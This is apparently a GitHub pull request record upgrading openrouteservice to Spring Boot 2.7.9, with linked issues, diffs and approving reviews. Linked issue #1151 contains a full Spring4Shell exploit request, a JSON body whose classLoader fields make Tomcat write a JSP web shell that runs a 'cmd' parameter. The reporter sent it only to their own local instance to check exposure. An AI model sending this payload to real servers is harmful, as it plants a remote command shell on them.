### PR TITLE
 Update spring-boot to 2.7.9

### LINKED ISSUE #1025: Make use of Spring(-boot) Framework properly
#### Here's what I think could be improved
Currently the spring framework is "only" used to automatically generate the swagger2 api documentation.

Being an API framework for Java there is a lot of unused potential to ease deployment, development of the API and configuration of openrouteservice.

Spring and Spring-Boot should be updated and set up properly by:

- [x] #1318 
- [x] #1319 
- [x] #1029
- [x] #1026
- [x] #1345 
- [x] #1346
- [x] #1027
- [x] #1028
- [x] #1348 
- [x] use spring instead of tomcat for CORS settings. Fixed by:
	- https://github.com/GIScience/openrouteservice/pull/1396 
	- #994 
	- #1394 
	- #1358
- [ ] use spring(-boot) coding patterns (?)

### LINKED ISSUE #1026: updating to latest spring and spring-boot versions
versions are out of date and should be updated (duh)

### LINKED ISSUE #1151: Spring Shell RCE inquiry
https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement
https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/#applying-mitigations

Spring has announced an RCE affecting spring projects with the following stats:
- JDK 9 or higher
- Apache Tomcat as the Servlet container
- Packaged as a traditional WAR (in contrast to a Spring Boot executable jar)
- spring-webmvc or spring-webflux dependency
- Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions

Upon checking, through my docker deployment (with :latest), it seems that openrouteservice may by ticking all (or at least a lot) of these boxes. Because of this, I attempted an exploit against my local instance via

```
POST http://localhost:8082/ors/v2/directions/driving-car
{
    "class.module.classLoader.resources.context.parent.pipeline.first.pattern": "%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di",
    "class.module.classLoader.resources.context.parent.pipeline.first.suffix": ".jsp",
    "class.module.classLoader.resources.context.parent.pipeline.first.directory": "webapps/ROOT",
    "class.module.classLoader.resources.context.parent.pipeline.first.prefix": "shell",
    "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat": "",
    "coordinates": [[-82.590945,35.569088],[-82.539167,35.565559]]
}
```
In line with identified RCEs: https://github.com/TheGejr/SpringShell/blob/master/exp.py
It does not seem as though the RCE is successful, given that "class.module.classLoader.resources.context.parent.pipeline.first.pattern" fields are not found. 

I also ran the tomcat deployment in debug mode and traced the POST request, but it does not seem that the JSON de-serializer would ever allow for this type of access as 'AbstractJackson2HttpMessageConverter' simply states that the 'RouteRequest" object does not contain that field.

This leads me to believe that the vulnerability is not valid for the openrouteservice project, however, I wanted to bring it up for further investigation.

### Resolution
The Official Sprint post listed above does not a found solutions, around versions and disabling fields, if in fact the project is vulnerable

Thanks

### PR DESCRIPTION
**Pull request by MichaelsJP**
<details>
<summary>Details</summary>

</details>

### Pull Request Checklist

- [x] 1. I have [**rebased**][rebase] the latest version of the master branch into my feature branch and all conflicts
         have been resolved.
- [x] 2. I have added information about the change/addition to functionality to the CHANGELOG.md file under the
         [Unreleased] heading.
- [x] 4. I have removed unnecessary commented out code, imports and System.out.println statements.
- [x] 8. I have built graphs with my code of the Heidelberg.osm.gz file and run the api-tests with all test passing
- [x] 12. I have written in the Pull Request information about the changes made including their intended usage
          and why the change was needed.

Things to check before merge:

- [x] check the base api url consistency (/ors/v2 vs /v2).
	- the `context-path` setting enforces /ors also in production when run with maven. This is a breaking change and should be avoided. The easier way is to remove the /ors completely. That means local dev setups won't have this path.
- [x] change `run_api_tests.sh` to curl for `v2/status` instead of `ors.run`
- [x]  check for correct config file configurations (run path of spring -> built-in tomcat is different from tomcat7 -> spring )
- [x] Add dev setup documentation for intelllij
- [x] Fix docker setup

Fixes #1151 
Closes #1026
closes #1285 
Partially touches #1025

### Information about the changes
- Key functionality added: Upgrade to spring-boot 2.7.9. Partially, the code wasn't properly using java11 and had to be fixed.
- Reason for change: The current spring-boot version is outdated and not maintained anymore.

### Required changes to ors config (if applicable)
- The new spring-boot update requires us to use the built-in tomcat runner. That runner has a different run path than the original tomcat7 servlet container. The testing config needs to be adjusted for this.

[config]: https://GIScience.github.io/openrouteservice/installation/Configuration.html
[api]: https://gitlab.gistools.geog.uni-heidelberg.de/giscience/openrouteservice-infrastructure/ors-docs-api#test-new-ors-documentation
[rebase]: https://github.com/GIScience/openrouteservice/blob/master/CONTRIBUTE.md#pull-request-guidelines

### CODE REVIEW

**Comment by MichaelsJP** [comment]
Supersedes the old PR #1285 to spring 2.7.8

Closes #1285

**Review by jlink — APPROVED** [review]
LGTM as far as I'm competent which is only a little

**Comment by MichaelsJP** [comment]
Thinks to check before merge:

- [ ] test the base api url consistency (/ors/v2 vs /v2).
- [ ]  check for correct config file configurations (run path of spring -> built-in tomcat is different from tomcat7 -> spring )

File: openrouteservice/src/main/java/org/heigit/ors/api/converters/APIRequestProfileConverter.java [hunk 1]
```diff
@@ -15,17 +15,23 @@
 
 package org.heigit.ors.api.converters;
 
-import org.springframework.core.convert.converter.Converter;
 import org.heigit.ors.api.requests.common.APIEnums;
+import org.jetbrains.annotations.NotNull;
```
Comment (jlink) [inline openrouteservice/src/main/java/org/heigit/ors/api/converters/APIRequestProfileConverter.java]: Did that get in on purpose or by accident?

File: openrouteservice/src/main/resources/application.properties [hunk 2]
```diff
@@ -1,2 +1,6 @@
+# Workaround for failing springfox-swagger2.
+# springfox-swagger2 should be replaced by the maintained springdoc-openapi
+spring.mvc.pathmatch.matching-strategy = ANT_PATH_MATCHER
+server.servlet.context-path=/ors
```
Comment (jlink) [inline openrouteservice/src/main/resources/application.properties:5]: Will fix context path for WAR file as well. Should be removed.

**Review by jlink — APPROVED** [review]
LGTM. Complex running of ITs can be handled in other PR.

**Review by takb — APPROVED** [review]
LGTM

**Pull request merged**